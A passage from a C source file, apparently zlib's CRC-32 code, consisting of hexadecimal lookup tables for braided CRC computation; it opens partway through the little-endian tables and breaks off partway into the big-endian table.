0xc60fb248, 0xa5086b6c, 0x576e62d1, 0x3469bbf5, 0x9161d099, 0xf26609bd, 0xaedcc5a2, 0xcddb1c86, 0x68d377ea, 0x0bd4aece, 0xf9b2a773, 0x9ab57e57, 0x3fbd153b, 0x5cbacc1f, 0x86c88d05, 0xe5cf5421, 0x40c73f4d, 0x23c0e669, 0xd1a6efd4, 0xb2a136f0, 0x17a95d9c, 0x74ae84b8, 0x281448a7, 0x4b139183, 0xee1bfaef, 0x8d1c23cb, 0x7f7a2a76, 0x1c7df352, 0xb975983e, 0xda72411a, 0xd6e01c4b, 0xb5e7c56f, 0x10efae03, 0x73e87727, 0x818e7e9a, 0xe289a7be, 0x4781ccd2, 0x248615f6, 0x783cd9e9, 0x1b3b00cd, 0xbe336ba1, 0xdd34b285, 0x2f52bb38, 0x4c55621c, 0xe95d0970, 0x8a5ad054, 0x5028914e, 0x332f486a, 0x96272306, 0xf520fa22, 0x0746f39f, 0x64412abb, 0xc14941d7, 0xa24e98f3, 0xfef454ec, 0x9df38dc8, 0x38fbe6a4, 0x5bfc3f80, 0xa99a363d, 0xca9def19, 0x6f958475, 0x0c925d51, 0x76b13ed7, 0x15b6e7f3, 
0xb0be8c9f, 0xd3b955bb, 0x21df5c06, 0x42d88522, 0xe7d0ee4e, 0x84d7376a, 0xd86dfb75, 0xbb6a2251, 0x1e62493d, 0x7d659019, 0x8f0399a4, 0xec044080, 0x490c2bec, 0x2a0bf2c8, 0xf079b3d2, 0x937e6af6, 0x3676019a, 0x5571d8be, 0xa717d103, 0xc4100827, 0x6118634b, 0x021fba6f, 0x5ea57670, 0x3da2af54, 0x98aac438, 0xfbad1d1c, 0x09cb14a1, 0x6acccd85, 0xcfc4a6e9, 0xacc37fcd, 0xa051229c, 0xc356fbb8, 0x665e90d4, 0x055949f0, 0xf73f404d, 0x94389969, 0x3130f205, 0x52372b21, 0x0e8de73e, 0x6d8a3e1a, 0xc8825576, 0xab858c52, 0x59e385ef, 0x3ae45ccb, 0x9fec37a7, 0xfcebee83, 0x2699af99, 0x459e76bd, 0xe0961dd1, 0x8391c4f5, 0x71f7cd48, 0x12f0146c, 0xb7f87f00, 0xd4ffa624, 0x88456a3b, 0xeb42b31f, 0x4e4ad873, 0x2d4d0157, 0xdf2b08ea, 0xbc2cd1ce, 0x1924baa2, 0x7a236386, 0xed627dae, 0x8e65a48a, 0x2b6dcfe6, 0x486a16c2, 0xba0c1f7f, 0xd90bc65b, 0x7c03ad37, 0x1f047413, 0x43beb80c, 0x20b96128, 0x85b10a44, 0xe6b6d360, 0x14d0dadd, 0x77d703f9, 0xd2df6895, 0xb1d8b1b1, 0x6baaf0ab, 0x08ad298f, 0xada542e3, 0xcea29bc7, 0x3cc4927a, 0x5fc34b5e, 0xfacb2032, 0x99ccf916, 0xc5763509, 0xa671ec2d, 0x03798741, 0x607e5e65, 0x921857d8, 0xf11f8efc, 0x5417e590, 0x37103cb4, 0x3b8261e5, 0x5885b8c1, 0xfd8dd3ad, 0x9e8a0a89, 0x6cec0334, 0x0febda10, 0xaae3b17c, 0xc9e46858, 0x955ea447, 0xf6597d63, 0x5351160f, 0x3056cf2b, 0xc230c696, 0xa1371fb2, 0x043f74de, 0x6738adfa, 0xbd4aece0, 0xde4d35c4, 0x7b455ea8, 0x1842878c, 0xea248e31, 0x89235715, 0x2c2b3c79, 0x4f2ce55d, 0x13962942, 0x7091f066, 0xd5999b0a, 0xb69e422e, 0x44f84b93, 0x27ff92b7, 0x82f7f9db, 0xe1f020ff, 0x9bd34379, 0xf8d49a5d, 0x5ddcf131, 0x3edb2815, 0xccbd21a8, 0xafbaf88c, 0x0ab293e0, 0x69b54ac4, 0x350f86db, 0x56085fff, 0xf3003493, 0x9007edb7, 0x6261e40a, 0x01663d2e, 0xa46e5642, 0xc7698f66, 0x1d1bce7c, 0x7e1c1758, 0xdb147c34, 0xb813a510, 0x4a75acad, 0x29727589, 0x8c7a1ee5, 0xef7dc7c1, 0xb3c70bde, 0xd0c0d2fa, 0x75c8b996, 0x16cf60b2, 0xe4a9690f, 0x87aeb02b, 0x22a6db47, 0x41a10263, 0x4d335f32, 0x2e348616, 0x8b3ced7a, 0xe83b345e, 0x1a5d3de3, 0x795ae4c7, 0xdc528fab, 0xbf55568f, 
0xe3ef9a90, 0x80e843b4, 0x25e028d8, 0x46e7f1fc, 0xb481f841, 0xd7862165, 0x728e4a09, 0x1189932d, 0xcbfbd237, 0xa8fc0b13, 0x0df4607f, 0x6ef3b95b, 0x9c95b0e6, 0xff9269c2, 0x5a9a02ae, 0x399ddb8a, 0x65271795, 0x0620ceb1, 0xa328a5dd, 0xc02f7cf9, 0x32497544, 0x514eac60, 0xf446c70c, 0x97411e28}, {0x00000000, 0x01b5fd1d, 0x036bfa3a, 0x02de0727, 0x06d7f474, 0x07620969, 0x05bc0e4e, 0x0409f353, 0x0dafe8e8, 0x0c1a15f5, 0x0ec412d2, 0x0f71efcf, 0x0b781c9c, 0x0acde181, 0x0813e6a6, 0x09a61bbb, 0x1b5fd1d0, 0x1aea2ccd, 0x18342bea, 0x1981d6f7, 0x1d8825a4, 0x1c3dd8b9, 0x1ee3df9e, 0x1f562283, 0x16f03938, 0x1745c425, 0x159bc302, 0x142e3e1f, 0x1027cd4c, 0x11923051, 0x134c3776, 0x12f9ca6b, 0x36bfa3a0, 0x370a5ebd, 0x35d4599a, 0x3461a487, 0x306857d4, 0x31ddaac9, 0x3303adee, 0x32b650f3, 0x3b104b48, 0x3aa5b655, 0x387bb172, 0x39ce4c6f, 0x3dc7bf3c, 0x3c724221, 0x3eac4506, 0x3f19b81b, 0x2de07270, 0x2c558f6d, 0x2e8b884a, 0x2f3e7557, 0x2b378604, 0x2a827b19, 0x285c7c3e, 0x29e98123, 0x204f9a98, 0x21fa6785, 0x232460a2, 0x22919dbf, 0x26986eec, 0x272d93f1, 0x25f394d6, 0x244669cb, 0x6d7f4740, 0x6ccaba5d, 0x6e14bd7a, 0x6fa14067, 0x6ba8b334, 0x6a1d4e29, 0x68c3490e, 0x6976b413, 0x60d0afa8, 0x616552b5, 0x63bb5592, 0x620ea88f, 0x66075bdc, 0x67b2a6c1, 0x656ca1e6, 0x64d95cfb, 0x76209690, 0x77956b8d, 0x754b6caa, 0x74fe91b7, 0x70f762e4, 0x71429ff9, 0x739c98de, 0x722965c3, 0x7b8f7e78, 0x7a3a8365, 0x78e48442, 0x7951795f, 0x7d588a0c, 0x7ced7711, 0x7e337036, 0x7f868d2b, 0x5bc0e4e0, 0x5a7519fd, 0x58ab1eda, 0x591ee3c7, 0x5d171094, 0x5ca2ed89, 0x5e7ceaae, 0x5fc917b3, 0x566f0c08, 0x57daf115, 0x5504f632, 0x54b10b2f, 0x50b8f87c, 0x510d0561, 0x53d30246, 0x5266ff5b, 0x409f3530, 0x412ac82d, 0x43f4cf0a, 0x42413217, 0x4648c144, 0x47fd3c59, 0x45233b7e, 0x4496c663, 0x4d30ddd8, 0x4c8520c5, 0x4e5b27e2, 0x4feedaff, 0x4be729ac, 0x4a52d4b1, 0x488cd396, 0x49392e8b, 0xdafe8e80, 0xdb4b739d, 0xd99574ba, 0xd82089a7, 0xdc297af4, 0xdd9c87e9, 0xdf4280ce, 0xdef77dd3, 0xd7516668, 0xd6e49b75, 0xd43a9c52, 0xd58f614f, 0xd186921c, 0xd0336f01, 
0xd2ed6826, 0xd358953b, 0xc1a15f50, 0xc014a24d, 0xc2caa56a, 0xc37f5877, 0xc776ab24, 0xc6c35639, 0xc41d511e, 0xc5a8ac03, 0xcc0eb7b8, 0xcdbb4aa5, 0xcf654d82, 0xced0b09f, 0xcad943cc, 0xcb6cbed1, 0xc9b2b9f6, 0xc80744eb, 0xec412d20, 0xedf4d03d, 0xef2ad71a, 0xee9f2a07, 0xea96d954, 0xeb232449, 0xe9fd236e, 0xe848de73, 0xe1eec5c8, 0xe05b38d5, 0xe2853ff2, 0xe330c2ef, 0xe73931bc, 0xe68ccca1, 0xe452cb86, 0xe5e7369b, 0xf71efcf0, 0xf6ab01ed, 0xf47506ca, 0xf5c0fbd7, 0xf1c90884, 0xf07cf599, 0xf2a2f2be, 0xf3170fa3, 0xfab11418, 0xfb04e905, 0xf9daee22, 0xf86f133f, 0xfc66e06c, 0xfdd31d71, 0xff0d1a56, 0xfeb8e74b, 0xb781c9c0, 0xb63434dd, 0xb4ea33fa, 0xb55fcee7, 0xb1563db4, 0xb0e3c0a9, 0xb23dc78e, 0xb3883a93, 0xba2e2128, 0xbb9bdc35, 0xb945db12, 0xb8f0260f, 0xbcf9d55c, 0xbd4c2841, 0xbf922f66, 0xbe27d27b, 0xacde1810, 0xad6be50d, 0xafb5e22a, 0xae001f37, 0xaa09ec64, 0xabbc1179, 0xa962165e, 0xa8d7eb43, 0xa171f0f8, 0xa0c40de5, 0xa21a0ac2, 0xa3aff7df, 0xa7a6048c, 0xa613f991, 0xa4cdfeb6, 0xa57803ab, 0x813e6a60, 0x808b977d, 0x8255905a, 0x83e06d47, 0x87e99e14, 0x865c6309, 0x8482642e, 0x85379933, 0x8c918288, 0x8d247f95, 0x8ffa78b2, 0x8e4f85af, 0x8a4676fc, 0x8bf38be1, 0x892d8cc6, 0x889871db, 0x9a61bbb0, 0x9bd446ad, 0x990a418a, 0x98bfbc97, 0x9cb64fc4, 0x9d03b2d9, 0x9fddb5fe, 0x9e6848e3, 0x97ce5358, 0x967bae45, 0x94a5a962, 0x9510547f, 0x9119a72c, 0x90ac5a31, 0x92725d16, 0x93c7a00b}, {0x00000000, 0x6e8c1b41, 0xdd183682, 0xb3942dc3, 0x61416b45, 0x0fcd7004, 0xbc595dc7, 0xd2d54686, 0xc282d68a, 0xac0ecdcb, 0x1f9ae008, 0x7116fb49, 0xa3c3bdcf, 0xcd4fa68e, 0x7edb8b4d, 0x1057900c, 0x5e74ab55, 0x30f8b014, 0x836c9dd7, 0xede08696, 0x3f35c010, 0x51b9db51, 0xe22df692, 0x8ca1edd3, 0x9cf67ddf, 0xf27a669e, 0x41ee4b5d, 0x2f62501c, 0xfdb7169a, 0x933b0ddb, 0x20af2018, 0x4e233b59, 0xbce956aa, 0xd2654deb, 0x61f16028, 0x0f7d7b69, 0xdda83def, 0xb32426ae, 0x00b00b6d, 0x6e3c102c, 0x7e6b8020, 0x10e79b61, 0xa373b6a2, 0xcdffade3, 0x1f2aeb65, 0x71a6f024, 0xc232dde7, 0xacbec6a6, 0xe29dfdff, 0x8c11e6be, 0x3f85cb7d, 0x5109d03c, 
0x83dc96ba, 0xed508dfb, 0x5ec4a038, 0x3048bb79, 0x201f2b75, 0x4e933034, 0xfd071df7, 0x938b06b6, 0x415e4030, 0x2fd25b71, 0x9c4676b2, 0xf2ca6df3, 0xa2a3ab15, 0xcc2fb054, 0x7fbb9d97, 0x113786d6, 0xc3e2c050, 0xad6edb11, 0x1efaf6d2, 0x7076ed93, 0x60217d9f, 0x0ead66de, 0xbd394b1d, 0xd3b5505c, 0x016016da, 0x6fec0d9b, 0xdc782058, 0xb2f43b19, 0xfcd70040, 0x925b1b01, 0x21cf36c2, 0x4f432d83, 0x9d966b05, 0xf31a7044, 0x408e5d87, 0x2e0246c6, 0x3e55d6ca, 0x50d9cd8b, 0xe34de048, 0x8dc1fb09, 0x5f14bd8f, 0x3198a6ce, 0x820c8b0d, 0xec80904c, 0x1e4afdbf, 0x70c6e6fe, 0xc352cb3d, 0xadded07c, 0x7f0b96fa, 0x11878dbb, 0xa213a078, 0xcc9fbb39, 0xdcc82b35, 0xb2443074, 0x01d01db7, 0x6f5c06f6, 0xbd894070, 0xd3055b31, 0x609176f2, 0x0e1d6db3, 0x403e56ea, 0x2eb24dab, 0x9d266068, 0xf3aa7b29, 0x217f3daf, 0x4ff326ee, 0xfc670b2d, 0x92eb106c, 0x82bc8060, 0xec309b21, 0x5fa4b6e2, 0x3128ada3, 0xe3fdeb25, 0x8d71f064, 0x3ee5dda7, 0x5069c6e6, 0x9e36506b, 0xf0ba4b2a, 0x432e66e9, 0x2da27da8, 0xff773b2e, 0x91fb206f, 0x226f0dac, 0x4ce316ed, 0x5cb486e1, 0x32389da0, 0x81acb063, 0xef20ab22, 0x3df5eda4, 0x5379f6e5, 0xe0eddb26, 0x8e61c067, 0xc042fb3e, 0xaecee07f, 0x1d5acdbc, 0x73d6d6fd, 0xa103907b, 0xcf8f8b3a, 0x7c1ba6f9, 0x1297bdb8, 0x02c02db4, 0x6c4c36f5, 0xdfd81b36, 0xb1540077, 0x638146f1, 0x0d0d5db0, 0xbe997073, 0xd0156b32, 0x22df06c1, 0x4c531d80, 0xffc73043, 0x914b2b02, 0x439e6d84, 0x2d1276c5, 0x9e865b06, 0xf00a4047, 0xe05dd04b, 0x8ed1cb0a, 0x3d45e6c9, 0x53c9fd88, 0x811cbb0e, 0xef90a04f, 0x5c048d8c, 0x328896cd, 0x7cabad94, 0x1227b6d5, 0xa1b39b16, 0xcf3f8057, 0x1deac6d1, 0x7366dd90, 0xc0f2f053, 0xae7eeb12, 0xbe297b1e, 0xd0a5605f, 0x63314d9c, 0x0dbd56dd, 0xdf68105b, 0xb1e40b1a, 0x027026d9, 0x6cfc3d98, 0x3c95fb7e, 0x5219e03f, 0xe18dcdfc, 0x8f01d6bd, 0x5dd4903b, 0x33588b7a, 0x80cca6b9, 0xee40bdf8, 0xfe172df4, 0x909b36b5, 0x230f1b76, 0x4d830037, 0x9f5646b1, 0xf1da5df0, 0x424e7033, 0x2cc26b72, 0x62e1502b, 0x0c6d4b6a, 0xbff966a9, 0xd1757de8, 0x03a03b6e, 0x6d2c202f, 0xdeb80dec, 0xb03416ad, 0xa06386a1, 0xceef9de0, 
0x7d7bb023, 0x13f7ab62, 0xc122ede4, 0xafaef6a5, 0x1c3adb66, 0x72b6c027, 0x807cadd4, 0xeef0b695, 0x5d649b56, 0x33e88017, 0xe13dc691, 0x8fb1ddd0, 0x3c25f013, 0x52a9eb52, 0x42fe7b5e, 0x2c72601f, 0x9fe64ddc, 0xf16a569d, 0x23bf101b, 0x4d330b5a, 0xfea72699, 0x902b3dd8, 0xde080681, 0xb0841dc0, 0x03103003, 0x6d9c2b42, 0xbf496dc4, 0xd1c57685, 0x62515b46, 0x0cdd4007, 0x1c8ad00b, 0x7206cb4a, 0xc192e689, 0xaf1efdc8, 0x7dcbbb4e, 0x1347a00f, 0xa0d38dcc, 0xce5f968d}, {0x00000000, 0xe71da697, 0x154a4b6f, 0xf257edf8, 0x2a9496de, 0xcd893049, 0x3fdeddb1, 0xd8c37b26, 0x55292dbc, 0xb2348b2b, 0x406366d3, 0xa77ec044, 0x7fbdbb62, 0x98a01df5, 0x6af7f00d, 0x8dea569a, 0xaa525b78, 0x4d4ffdef, 0xbf181017, 0x5805b680, 0x80c6cda6, 0x67db6b31, 0x958c86c9, 0x7291205e, 0xff7b76c4, 0x1866d053, 0xea313dab, 0x0d2c9b3c, 0xd5efe01a, 0x32f2468d, 0xc0a5ab75, 0x27b80de2, 0x8fd5b0b1, 0x68c81626, 0x9a9ffbde, 0x7d825d49, 0xa541266f, 0x425c80f8, 0xb00b6d00, 0x5716cb97, 0xdafc9d0d, 0x3de13b9a, 0xcfb6d662, 0x28ab70f5, 0xf0680bd3, 0x1775ad44, 0xe52240bc, 0x023fe62b, 0x2587ebc9, 0xc29a4d5e, 0x30cda0a6, 0xd7d00631, 0x0f137d17, 0xe80edb80, 0x1a593678, 0xfd4490ef, 0x70aec675, 0x97b360e2, 0x65e48d1a, 0x82f92b8d, 0x5a3a50ab, 0xbd27f63c, 0x4f701bc4, 0xa86dbd53, 0xc4da6723, 0x23c7c1b4, 0xd1902c4c, 0x368d8adb, 0xee4ef1fd, 0x0953576a, 0xfb04ba92, 0x1c191c05, 0x91f34a9f, 0x76eeec08, 0x84b901f0, 0x63a4a767, 0xbb67dc41, 0x5c7a7ad6, 0xae2d972e, 0x493031b9, 0x6e883c5b, 0x89959acc, 0x7bc27734, 0x9cdfd1a3, 0x441caa85, 0xa3010c12, 0x5156e1ea, 0xb64b477d, 0x3ba111e7, 0xdcbcb770, 0x2eeb5a88, 0xc9f6fc1f, 0x11358739, 0xf62821ae, 0x047fcc56, 0xe3626ac1, 0x4b0fd792, 0xac127105, 0x5e459cfd, 0xb9583a6a, 0x619b414c, 0x8686e7db, 0x74d10a23, 0x93ccacb4, 0x1e26fa2e, 0xf93b5cb9, 0x0b6cb141, 0xec7117d6, 0x34b26cf0, 0xd3afca67, 0x21f8279f, 0xc6e58108, 0xe15d8cea, 0x06402a7d, 0xf417c785, 0x130a6112, 0xcbc91a34, 0x2cd4bca3, 0xde83515b, 0x399ef7cc, 0xb474a156, 0x536907c1, 0xa13eea39, 0x46234cae, 0x9ee03788, 0x79fd911f, 0x8baa7ce7, 0x6cb7da70, 
0x52c5c807, 0xb5d86e90, 0x478f8368, 0xa09225ff, 0x78515ed9, 0x9f4cf84e, 0x6d1b15b6, 0x8a06b321, 0x07ece5bb, 0xe0f1432c, 0x12a6aed4, 0xf5bb0843, 0x2d787365, 0xca65d5f2, 0x3832380a, 0xdf2f9e9d, 0xf897937f, 0x1f8a35e8, 0xedddd810, 0x0ac07e87, 0xd20305a1, 0x351ea336, 0xc7494ece, 0x2054e859, 0xadbebec3, 0x4aa31854, 0xb8f4f5ac, 0x5fe9533b, 0x872a281d, 0x60378e8a, 0x92606372, 0x757dc5e5, 0xdd1078b6, 0x3a0dde21, 0xc85a33d9, 0x2f47954e, 0xf784ee68, 0x109948ff, 0xe2cea507, 0x05d30390, 0x8839550a, 0x6f24f39d, 0x9d731e65, 0x7a6eb8f2, 0xa2adc3d4, 0x45b06543, 0xb7e788bb, 0x50fa2e2c, 0x774223ce, 0x905f8559, 0x620868a1, 0x8515ce36, 0x5dd6b510, 0xbacb1387, 0x489cfe7f, 0xaf8158e8, 0x226b0e72, 0xc576a8e5, 0x3721451d, 0xd03ce38a, 0x08ff98ac, 0xefe23e3b, 0x1db5d3c3, 0xfaa87554, 0x961faf24, 0x710209b3, 0x8355e44b, 0x644842dc, 0xbc8b39fa, 0x5b969f6d, 0xa9c17295, 0x4edcd402, 0xc3368298, 0x242b240f, 0xd67cc9f7, 0x31616f60, 0xe9a21446, 0x0ebfb2d1, 0xfce85f29, 0x1bf5f9be, 0x3c4df45c, 0xdb5052cb, 0x2907bf33, 0xce1a19a4, 0x16d96282, 0xf1c4c415, 0x039329ed, 0xe48e8f7a, 0x6964d9e0, 0x8e797f77, 0x7c2e928f, 0x9b333418, 0x43f04f3e, 0xa4ede9a9, 0x56ba0451, 0xb1a7a2c6, 0x19ca1f95, 0xfed7b902, 0x0c8054fa, 0xeb9df26d, 0x335e894b, 0xd4432fdc, 0x2614c224, 0xc10964b3, 0x4ce33229, 0xabfe94be, 0x59a97946, 0xbeb4dfd1, 0x6677a4f7, 0x816a0260, 0x733def98, 0x9420490f, 0xb39844ed, 0x5485e27a, 0xa6d20f82, 0x41cfa915, 0x990cd233, 0x7e1174a4, 0x8c46995c, 0x6b5b3fcb, 0xe6b16951, 0x01accfc6, 0xf3fb223e, 0x14e684a9, 0xcc25ff8f, 0x2b385918, 0xd96fb4e0, 0x3e721277}, {0x00000000, 0xa58b900e, 0x9066265d, 0x35edb653, 0xfbbd4afb, 0x5e36daf5, 0x6bdb6ca6, 0xce50fca8, 0x2c0b93b7, 0x898003b9, 0xbc6db5ea, 0x19e625e4, 0xd7b6d94c, 0x723d4942, 0x47d0ff11, 0xe25b6f1f, 0x5817276e, 0xfd9cb760, 0xc8710133, 0x6dfa913d, 0xa3aa6d95, 0x0621fd9b, 0x33cc4bc8, 0x9647dbc6, 0x741cb4d9, 0xd19724d7, 0xe47a9284, 0x41f1028a, 0x8fa1fe22, 0x2a2a6e2c, 0x1fc7d87f, 0xba4c4871, 0xb02e4edc, 0x15a5ded2, 0x20486881, 0x85c3f88f, 0x4b930427, 0xee189429, 
0xdbf5227a, 0x7e7eb274, 0x9c25dd6b, 0x39ae4d65, 0x0c43fb36, 0xa9c86b38, 0x67989790, 0xc213079e, 0xf7feb1cd, 0x527521c3, 0xe83969b2, 0x4db2f9bc, 0x785f4fef, 0xddd4dfe1, 0x13842349, 0xb60fb347, 0x83e20514, 0x2669951a, 0xc432fa05, 0x61b96a0b, 0x5454dc58, 0xf1df4c56, 0x3f8fb0fe, 0x9a0420f0, 0xafe996a3, 0x0a6206ad, 0xbb2d9bf9, 0x1ea60bf7, 0x2b4bbda4, 0x8ec02daa, 0x4090d102, 0xe51b410c, 0xd0f6f75f, 0x757d6751, 0x9726084e, 0x32ad9840, 0x07402e13, 0xa2cbbe1d, 0x6c9b42b5, 0xc910d2bb, 0xfcfd64e8, 0x5976f4e6, 0xe33abc97, 0x46b12c99, 0x735c9aca, 0xd6d70ac4, 0x1887f66c, 0xbd0c6662, 0x88e1d031, 0x2d6a403f, 0xcf312f20, 0x6ababf2e, 0x5f57097d, 0xfadc9973, 0x348c65db, 0x9107f5d5, 0xa4ea4386, 0x0161d388, 0x0b03d525, 0xae88452b, 0x9b65f378, 0x3eee6376, 0xf0be9fde, 0x55350fd0, 0x60d8b983, 0xc553298d, 0x27084692, 0x8283d69c, 0xb76e60cf, 0x12e5f0c1, 0xdcb50c69, 0x793e9c67, 0x4cd32a34, 0xe958ba3a, 0x5314f24b, 0xf69f6245, 0xc372d416, 0x66f94418, 0xa8a9b8b0, 0x0d2228be, 0x38cf9eed, 0x9d440ee3, 0x7f1f61fc, 0xda94f1f2, 0xef7947a1, 0x4af2d7af, 0x84a22b07, 0x2129bb09, 0x14c40d5a, 0xb14f9d54, 0xad2a31b3, 0x08a1a1bd, 0x3d4c17ee, 0x98c787e0, 0x56977b48, 0xf31ceb46, 0xc6f15d15, 0x637acd1b, 0x8121a204, 0x24aa320a, 0x11478459, 0xb4cc1457, 0x7a9ce8ff, 0xdf1778f1, 0xeafacea2, 0x4f715eac, 0xf53d16dd, 0x50b686d3, 0x655b3080, 0xc0d0a08e, 0x0e805c26, 0xab0bcc28, 0x9ee67a7b, 0x3b6dea75, 0xd936856a, 0x7cbd1564, 0x4950a337, 0xecdb3339, 0x228bcf91, 0x87005f9f, 0xb2ede9cc, 0x176679c2, 0x1d047f6f, 0xb88fef61, 0x8d625932, 0x28e9c93c, 0xe6b93594, 0x4332a59a, 0x76df13c9, 0xd35483c7, 0x310fecd8, 0x94847cd6, 0xa169ca85, 0x04e25a8b, 0xcab2a623, 0x6f39362d, 0x5ad4807e, 0xff5f1070, 0x45135801, 0xe098c80f, 0xd5757e5c, 0x70feee52, 0xbeae12fa, 0x1b2582f4, 0x2ec834a7, 0x8b43a4a9, 0x6918cbb6, 0xcc935bb8, 0xf97eedeb, 0x5cf57de5, 0x92a5814d, 0x372e1143, 0x02c3a710, 0xa748371e, 0x1607aa4a, 0xb38c3a44, 0x86618c17, 0x23ea1c19, 0xedbae0b1, 0x483170bf, 0x7ddcc6ec, 0xd85756e2, 0x3a0c39fd, 0x9f87a9f3, 0xaa6a1fa0, 0x0fe18fae, 
0xc1b17306, 0x643ae308, 0x51d7555b, 0xf45cc555, 0x4e108d24, 0xeb9b1d2a, 0xde76ab79, 0x7bfd3b77, 0xb5adc7df, 0x102657d1, 0x25cbe182, 0x8040718c, 0x621b1e93, 0xc7908e9d, 0xf27d38ce, 0x57f6a8c0, 0x99a65468, 0x3c2dc466, 0x09c07235, 0xac4be23b, 0xa629e496, 0x03a27498, 0x364fc2cb, 0x93c452c5, 0x5d94ae6d, 0xf81f3e63, 0xcdf28830, 0x6879183e, 0x8a227721, 0x2fa9e72f, 0x1a44517c, 0xbfcfc172, 0x719f3dda, 0xd414add4, 0xe1f91b87, 0x44728b89, 0xfe3ec3f8, 0x5bb553f6, 0x6e58e5a5, 0xcbd375ab, 0x05838903, 0xa008190d, 0x95e5af5e, 0x306e3f50, 0xd235504f, 0x77bec041, 0x42537612, 0xe7d8e61c, 0x29881ab4, 0x8c038aba, 0xb9ee3ce9, 0x1c65ace7}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0x0e908ba500000000, 0x5d26669000000000, 0x53b6ed3500000000, 0xfb4abdfb00000000, 0xf5da365e00000000, 0xa66cdb6b00000000, 0xa8fc50ce00000000, 0xb7930b2c00000000, 0xb903808900000000, 0xeab56dbc00000000, 0xe425e61900000000, 0x4cd9b6d700000000, 0x42493d7200000000, 0x11ffd04700000000, 0x1f6f5be200000000, 0x6e27175800000000, 0x60b79cfd00000000, 0x330171c800000000, 0x3d91fa6d00000000, 0x956daaa300000000, 0x9bfd210600000000, 0xc84bcc3300000000, 0xc6db479600000000, 0xd9b41c7400000000, 0xd72497d100000000, 0x84927ae400000000, 0x8a02f14100000000, 0x22fea18f00000000, 0x2c6e2a2a00000000, 0x7fd8c71f00000000, 0x71484cba00000000, 0xdc4e2eb000000000, 0xd2dea51500000000, 0x8168482000000000, 0x8ff8c38500000000, 0x2704934b00000000, 0x299418ee00000000, 0x7a22f5db00000000, 0x74b27e7e00000000, 0x6bdd259c00000000, 0x654dae3900000000, 0x36fb430c00000000, 0x386bc8a900000000, 0x9097986700000000, 0x9e0713c200000000, 0xcdb1fef700000000, 0xc321755200000000, 0xb26939e800000000, 0xbcf9b24d00000000, 0xef4f5f7800000000, 0xe1dfd4dd00000000, 0x4923841300000000, 0x47b30fb600000000, 0x1405e28300000000, 0x1a95692600000000, 0x05fa32c400000000, 0x0b6ab96100000000, 0x58dc545400000000, 0x564cdff100000000, 0xfeb08f3f00000000, 0xf020049a00000000, 0xa396e9af00000000, 0xad06620a00000000, 0xf99b2dbb00000000, 
0xf70ba61e00000000, 0xa4bd4b2b00000000, 0xaa2dc08e00000000, 0x02d1904000000000, 0x0c411be500000000, 0x5ff7f6d000000000, 0x51677d7500000000, 0x4e08269700000000, 0x4098ad3200000000, 0x132e400700000000, 0x1dbecba200000000, 0xb5429b6c00000000, 0xbbd210c900000000, 0xe864fdfc00000000, 0xe6f4765900000000, 0x97bc3ae300000000, 0x992cb14600000000, 0xca9a5c7300000000, 0xc40ad7d600000000, 0x6cf6871800000000, 0x62660cbd00000000, 0x31d0e18800000000, 0x3f406a2d00000000, 0x202f31cf00000000, 0x2ebfba6a00000000, 0x7d09575f00000000, 0x7399dcfa00000000, 0xdb658c3400000000, 0xd5f5079100000000, 0x8643eaa400000000, 0x88d3610100000000, 0x25d5030b00000000, 0x2b4588ae00000000, 0x78f3659b00000000, 0x7663ee3e00000000, 0xde9fbef000000000, 0xd00f355500000000, 0x83b9d86000000000, 0x8d2953c500000000, 0x9246082700000000, 0x9cd6838200000000, 0xcf606eb700000000, 0xc1f0e51200000000, 0x690cb5dc00000000, 0x679c3e7900000000, 0x342ad34c00000000, 0x3aba58e900000000, 0x4bf2145300000000, 0x45629ff600000000, 0x16d472c300000000, 0x1844f96600000000, 0xb0b8a9a800000000, 0xbe28220d00000000, 0xed9ecf3800000000, 0xe30e449d00000000, 0xfc611f7f00000000, 0xf2f194da00000000, 0xa14779ef00000000, 0xafd7f24a00000000, 0x072ba28400000000, 0x09bb292100000000, 0x5a0dc41400000000, 0x549d4fb100000000, 0xb3312aad00000000, 0xbda1a10800000000, 0xee174c3d00000000, 0xe087c79800000000, 0x487b975600000000, 0x46eb1cf300000000, 0x155df1c600000000, 0x1bcd7a6300000000, 0x04a2218100000000, 0x0a32aa2400000000, 0x5984471100000000, 0x5714ccb400000000, 0xffe89c7a00000000, 0xf17817df00000000, 0xa2cefaea00000000, 0xac5e714f00000000, 0xdd163df500000000, 0xd386b65000000000, 0x80305b6500000000, 0x8ea0d0c000000000, 0x265c800e00000000, 0x28cc0bab00000000, 0x7b7ae69e00000000, 0x75ea6d3b00000000, 0x6a8536d900000000, 0x6415bd7c00000000, 0x37a3504900000000, 0x3933dbec00000000, 0x91cf8b2200000000, 0x9f5f008700000000, 0xcce9edb200000000, 0xc279661700000000, 0x6f7f041d00000000, 0x61ef8fb800000000, 0x3259628d00000000, 0x3cc9e92800000000, 0x9435b9e600000000, 
0x9aa5324300000000, 0xc913df7600000000, 0xc78354d300000000, 0xd8ec0f3100000000, 0xd67c849400000000, 0x85ca69a100000000, 0x8b5ae20400000000, 0x23a6b2ca00000000, 0x2d36396f00000000, 0x7e80d45a00000000, 0x70105fff00000000, 0x0158134500000000, 0x0fc898e000000000, 0x5c7e75d500000000, 0x52eefe7000000000, 0xfa12aebe00000000, 0xf482251b00000000, 0xa734c82e00000000, 0xa9a4438b00000000, 0xb6cb186900000000, 0xb85b93cc00000000, 0xebed7ef900000000, 0xe57df55c00000000, 0x4d81a59200000000, 0x43112e3700000000, 0x10a7c30200000000, 0x1e3748a700000000, 0x4aaa071600000000, 0x443a8cb300000000, 0x178c618600000000, 0x191cea2300000000, 0xb1e0baed00000000, 0xbf70314800000000, 0xecc6dc7d00000000, 0xe25657d800000000, 0xfd390c3a00000000, 0xf3a9879f00000000, 0xa01f6aaa00000000, 0xae8fe10f00000000, 0x0673b1c100000000, 0x08e33a6400000000, 0x5b55d75100000000, 0x55c55cf400000000, 0x248d104e00000000, 0x2a1d9beb00000000, 0x79ab76de00000000, 0x773bfd7b00000000, 0xdfc7adb500000000, 0xd157261000000000, 0x82e1cb2500000000, 0x8c71408000000000, 0x931e1b6200000000, 0x9d8e90c700000000, 0xce387df200000000, 0xc0a8f65700000000, 0x6854a69900000000, 0x66c42d3c00000000, 0x3572c00900000000, 0x3be24bac00000000, 0x96e429a600000000, 0x9874a20300000000, 0xcbc24f3600000000, 0xc552c49300000000, 0x6dae945d00000000, 0x633e1ff800000000, 0x3088f2cd00000000, 0x3e18796800000000, 0x2177228a00000000, 0x2fe7a92f00000000, 0x7c51441a00000000, 0x72c1cfbf00000000, 0xda3d9f7100000000, 